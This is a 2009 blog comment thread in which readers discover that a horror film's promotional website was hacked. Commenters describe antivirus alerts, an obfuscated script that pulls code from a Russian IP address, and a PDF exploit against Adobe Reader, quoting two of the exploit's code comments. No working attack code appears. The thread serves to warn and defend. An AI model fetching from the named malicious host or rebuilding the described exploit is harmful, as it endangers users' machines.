Go to Making Light's front page.
Forward to next post: Open thread 126
Subscribe (via RSS) to this post's comment thread. (What does this mean? Here's a quick introduction.)
Well, folks. Some filmmakers are in town. They’re making a movie up in Pittsburg.
I can make some guesses about what happened to the people of Friar:
They spent their days trying to translate between Unix and Windows, and grew ever stranger and more peculiar, until one night ...
Not to my taste, thanks. But it looks like it should be decent for horror fans.
Um. The making a movie site link triggered my browser's fraudulent website warning and directed me to a Google Safe Browsing diagnostic page, which reported the following:
"The last time Google visited this site was on 2009-06-16, and the last time suspicious content was found on this site was on 2009-06-16. Malicious software includes 143 trojan(s), 48 scripting exploit(s), 27 exploit(s)."
FYI, here's the address of the Google page to which my browser directed me:
http://google.com/safebrowsing/diagnostic?tpl=safari&site=91.212.65.148&hl=en-us
Here's their MySpace page.
(I'm not getting Google alerts, nor are any of my AV programs popping up warnings....)
The site does have annoying music....
91.212.65.148 seems to be located in Russia. I'm pretty sure that yellowbrickroadthemovie.com isn't hosted there.
Avasti AV gives me a warning on that site.
A quick check on a Linux box shows a site very dependent on Flash, apparently with no way past the the opening page without using Flash and scripts.
I'm not curious enough to take chances.
I tried to check the MySpace page and my eyes fell out.
A totally safe site:
http://www.granitestatenews.com/Articles-c-2009-06-10-148766.113119_Horror_on_Main_Street.html
I'm back home now. Yellowbrickroadthemovie.com is at 67.228.235.94
91.212.65.148 is indeed somewhere in Russia. I dunno how that popped up.
The official site is pretty darned Flash-heavy.
Here are the sub-pages:
http://www.yellwobrickroadthemovie.com/CONTACT.html
http://www.yellowbrickroadthemovie.com/TRAILER.html
http://www.yellowbrickroadthemovie.com/LEGEND.html
http://www.yellowbrickroadthemovie.com/EXPEDITION.html
http://www.yellowbrickroadthemovie.com/MESSAGE.html
The trailer doesn't seem to exist. (Seeing as the principal photography hasn't happened yet, this isn't surprising.)
I don't have a knee jerk reaction against Flash - it's great for games, interactive artworks, video and music players, visualisation tools...
But why why why is someone using it to navigate through what are basically a set of pages of text with still pictures? Oh well...
Drifting back on topic, I love seeing my city (Melbourne, Aus) on film. I even rented Queen of the Damned (don't!) just to play "look for the Melbourne locations".
Steve Taylor @ 10 ...
I do have a knee-jerk reaction against flash. When it's used appropriately, it's almost invisible -- but it's so often used inappropriately that my first reaction is inevitably "not -that- again" followed by closing the window.
xeger at #11 writes:
> I do have a knee-jerk reaction against flash. When it's used appropriately, it's almost invisible -- but it's so often used inappropriately that my first reaction is inevitably "not -that- again" followed by closing the window.
I admit I do use the Firefox "FlashBlock" plugin in self defence. I just wish there was a setting to not animate animated gifs without my permission. But then I've got to defend myself against javascript and dhtml based animation as well. Why can't people just play nice?
Jim, #9: I didn't have any trouble with your original link (which does indeed go to yellowbrickroadthemovie.com), and the trailer was there when I clicked on it. That's what prompted my post #2, was watching it.
Ah yes, I see. There is a trailer. It just takes forever to download.
My Norton 2009 is popping "Bloodhound.Expolit.196" which it identifies as a heuristic virus. The warning showed up as soon as I connected to the site.
yep, I got a trojan horse and a dropper virus from that site :-(
Yeah, when I loaded that site, it tried to redirect me to a PDF containing javascript that tries to exploit heap-overflow bugs in Adobe Acrobat. It's quite a bit less obfuscated than the last time I saw this, and has amusing comments in it like
//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)
and
//adobe reader 8 works also with app.setTimeOut?
Should contact the owners of the site and tell them they need to clean it up. I've saved the malicious PDF and the decoded javascript in case anyone wants to see them.
Steve Taylor @12, in the Firefox about:config page, you can set "image.animation_mode" to either "none" or "once", or reset it back to "normal".
Okay, you guys have got me all paranoid now. I didn't have anything pop up on me, but I'll get my partner to run a full virus sweep while I'm off at the dentist.
Following up to myself to say that I can't actually find any contact info for the people responsible for that website. Neither CONTACT.htm nor CONTACT.html actually exists, there doesn't seem to be contact info anywhere else on the site, and their whois listing points to a very large hosting provider, midphase.com. I have emailed that provider's technical contact address, but I doubt that will have any effect.
Jim, if you have actually seen these film-makers, maybe you'd better pass on the malware warning. Somebody on the website side has been either careless or malicious.
If you haven't, do they even exist?
I'm just back from spending the day with them. They're nice people. I'll let 'em know.
I've disabled the link until the virus situation is resolved.
FWIW, I'm running Firefox with NoScript.
Jim @25:
The three infected files are all copies of "Trojan horse generic 13.BEGH"
And the random irreverent part of me pictures a large white horse, with a bar code on its side just below the word HORSE in sans-serif lettering.
TrendMicro give a completion time of 21 1/2 days. This might just take some time....
I did not hallucinate Jim's comment about that generic Trojan horse. Did not.
abi (27): <soothingly> We believe you. </soothingly>
You didn't. But I removed it because it might give the wrong impression. Further checking through the AVG files told me that they'd entered the Virus Vault on April 9, when I was out looking for updated video drivers.
TrendMicro is down to saying just four days. Things improve.
I've long considered that the existence of computer viruses is proof of the existence of original sin.
Earl Cooley III at #18 writes:
> Steve Taylor @12, in the Firefox about:config page, you can set "image.animation_mode" to either "none" or "once", or reset it back to "normal".
You star! My life is now slightly better.
All good things come from Making Light.
James: NoScript would totally block this attack; if you don't execute javascript it doesn't even get as far as reaching out to 91.212.65.148 to grab the malicious script that grabs the malicious PDF.
Their contact address is info[at]yellowbrickroadthemovie[dot]com
abi @ 27... Thought you were having a George Orr moment, eh?
It's worth finding a non-Adobe PDF viewer, so you're not 100% part of the monoculture for which the virus writers are adapted.
One thing that would be really useful is a setting or add-on for my browser, that would push the PDF file being opened off to some remote PDF-to-HTML server. Anyone know of any such thing?
albatross #35: Well, Google can do the conversion, so you could potentially just use them to look up the PDF's original URL.
Eric, the producer, thanks us for informing them that their site was hacked.
My virus scan showed no problems. Very likely the attempt was blocked by my Hosts File From Hell.
Sequential scans by TrendMicro Housecall, Malwarebytes, SuperAntiSpyware, and AVG, found a total of four tracking cookies.
I don't think I caught anything.
The post at the bottom of the thread here at BleepingComputer.com (from quietman7, Jun 9 2009, 06:22 AM, contains a ton of links to Antivirus resources.
I'm told that the movie guys were working on restoring their website. Could someone with greater ability than me take a look and see if it's (currently) clean?
As of about ten minutes ago, the site is not clean: there is still a Javascript fragment on the top-level index.html that pulls malicious code from 91.212.65.148. It is obfuscated to look like it has something to do with Google Analytics, but if you actually decode it it proves to be nothing of the sort.
I also see a very large number of spam links in /LEGEND.html, and further obfuscated Javascript that may also wind up triggering virus attacks (it is not as easy to decode as the stuff in index.html, so I haven't bothered).
The other HTML pages that are reachable from index.html (EXPEDITION.html, MESSAGE.html, NEWS.html, TRAILER.html) do not appear to contain any malicious code. They do have other problems: broken links (including not a few references to files on the website designer's local hard drive), and use of Javascript instead of CSS :hover styles for image rollovers (breaking the site for people who turn JS off).
As noted, the site is very Flash-heavy. I don't have the tools or skills to inspect Flash files for malware.
It could have been whacked via the hosting server. My employer had a problem a while ago where their web site got on the Google-sponsored malware list, again due to weird stuff inserted in framing code. When I searched the forums there, I found that a couple other sites on the same IP address (i.e. hosted on the same physical server) had been reported with the identical problem. I suspected the web server machine was cracked or had outdated software on it; I ended up getting the company to move hosting providers.
I managed to get Bloodhound.Exploit.196, several trojans, as well as the dreaded Spyware Protect 2009. It has taken me three days to clean up the machine, since Spyware Protect wormed its way into both the registry and the System Restore files.
Ah well. It's good to know that a trailer for a horror film creates actual horror. Somehow this seems right, in our post-digital age.
The film is Yellow Brick Road. It has an official trailer, now, that you can see at http://www.youtube.com/watch?v=RfX78jrrmi8
At IMDB it's http://www.imdb.com/title/tt1398428/
And they have a MySpace page at http://www.myspace.com/yellowbrickroadthemovie
Later on, maybe, I'll tell you about my two days as set medic.
Comments containing more than seven URLs will be held for approval. If you want to comment on a thread that's been closed, please post to the most recent "Open Thread" discussion.
You can subscribe (via RSS) to this particular comment thread. (If this option is baffling, here's a quick introduction.)
HTML Tags:
<strong>Strong</strong> = Strong
<em>Emphasized</em> = Emphasized
<a href="http://www.url.com">Linked text</a> = Linked text
Spelling reference:
Tolkien. Minuscule. Gandhi. Millennium. Delany. Embarrassment. Publishers Weekly. Occurrence. Asimov. Weird. Connoisseur. Accommodate. Hierarchy. Deity. Etiquette. Pharaoh. Teresa. Its. Macdonald. Nielsen Hayden. It's. Fluorosphere. Barack. More here.